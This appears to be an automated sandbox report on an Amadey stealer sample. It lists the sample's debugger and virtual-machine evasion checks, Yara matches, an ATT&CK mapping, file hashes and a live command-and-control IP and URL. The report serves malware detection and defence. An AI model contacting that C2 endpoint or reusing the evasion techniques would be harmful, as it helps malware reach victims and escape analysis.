                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: AB3FB5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: B39E72 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DA0DD4 rdtsc 0_2_04DA0DD4
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 418Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 380Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 8210Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692Thread sleep count: 54 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692Thread sleep time: -108054s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7688Thread sleep count: 56 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7688Thread sleep time: -112056s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664Thread sleep count: 418 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664Thread sleep time: -836418s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7652Thread sleep count: 380 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7652Thread sleep time: -11400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7764Thread sleep time: -1080000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7668Thread sleep count: 57 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7668Thread sleep time: -114057s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7684Thread sleep count: 59 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7684Thread sleep time: -118059s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7672Thread sleep count: 59 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7672Thread sleep time: -118059s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664Thread sleep count: 8210 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664Thread sleep time: -16428210s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000000.00000002.1489236339.0000000000E00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1485477807.0000000000852000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1518990398.0000000000A92000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000003.00000002.1519922749.0000000000A92000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DA0DD4 rdtsc 0_2_04DA0DD4
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008D645B mov eax, dword ptr fs:[00000030h]8_2_008D645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008DA1C2 mov eax, dword ptr fs:[00000030h]8_2_008DA1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: file.exe, 00000000.00000002.1485477807.0000000000852000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1518990398.0000000000A92000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000003.00000002.1519922749.0000000000A92000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Program Manager
                    Source: axplong.exeBinary or memory string: 0> Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008BD312 cpuid 8_2_008BD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,8_2_008BCB1A

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 2.2.axplong.exe.8a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.axplong.exe.8a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.axplong.exe.8a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000003.1978884229.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1476249631.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1475590462.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1445064913.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1485335503.0000000000661000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1519199500.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1518475574.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519874 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 6 other signatures 2->30 6 file.exe 5 2->6         started        10 axplong.exe 2->10         started        12 axplong.exe 12 2->12         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\axplong.exe, PE32 6->18 dropped 20 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 axplong.exe 6->15         started        38 Antivirus detection for dropped file 10->38 40 Multi AV Scanner detection for dropped file 10->40 42 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->42 44 Machine Learning detection for dropped file 10->44 22 185.215.113.16, 49710, 49711, 49712 WHOLESALECONNECTIONSNL Portugal 12->22 46 Hides threads from debuggers 12->46 48 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->48 50 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->50 file5 signatures6 process7 signatures8 52 Hides threads from debuggers 15->52 54 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->54 56 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->56

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%ReversingLabsWin32.Packed.Themida

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.phpm100%Avira URL Cloudphishing
                    http://185.215.113.16/-dt100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing
                    http://185.215.113.16/100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php)100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpvQ100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedfA100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpA100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php%100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedhA1100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpY100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpded?100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php8100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php=100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpHQ100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpU100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpiP100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpKP100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpded4100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php-PP100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                    • Avira URL Cloud: phishing
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpmaxplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpvQaxplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/-dtaxplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php)axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedfAaxplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php%axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedhA1axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpAaxplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpded?axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php=axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpYaxplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php8axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpHQaxplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpiPaxplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpUaxplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpKPaxplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpded4axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php-PPaxplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.16
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519874
                    Start date and time:2024-09-27 01:41:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 3392 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 6704 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 1012 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    01:42:09Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    19:43:01API Interceptor576390x Sleep call for process: axplong.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1874944
                    Entropy (8bit):7.950054398309737
                    Encrypted:false
                    SSDEEP:49152:YjBUKhKl0VrRLsa7d/yVaFHd25wLSEC3ymriMz:Yj/KlYRQa7dyVuw5wLSE6ymriM
                    MD5:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    SHA1:4F6D688E4294362965C5E74999CD6F4C24566956
                    SHA-256:E5DB33A91B7E4FD54196DAD1042DF50860DC815FDD1FB88A5E093EA2597CB196
                    SHA-512:7F64D463E9540A3625B5E68B4AFDF4237B0241C144C5FB047D86BFB8491A51F68C34C57566D09B67013B10325A5DA0B04664A30539D125CE6B85438846FA1B95
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 53%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................J...........@.................................W...k............................oJ..............................nJ..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...xtqiedmi......0.....................@...pzupkaig......J......v..............@....taggant.0....J.."...z..............@...........................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0

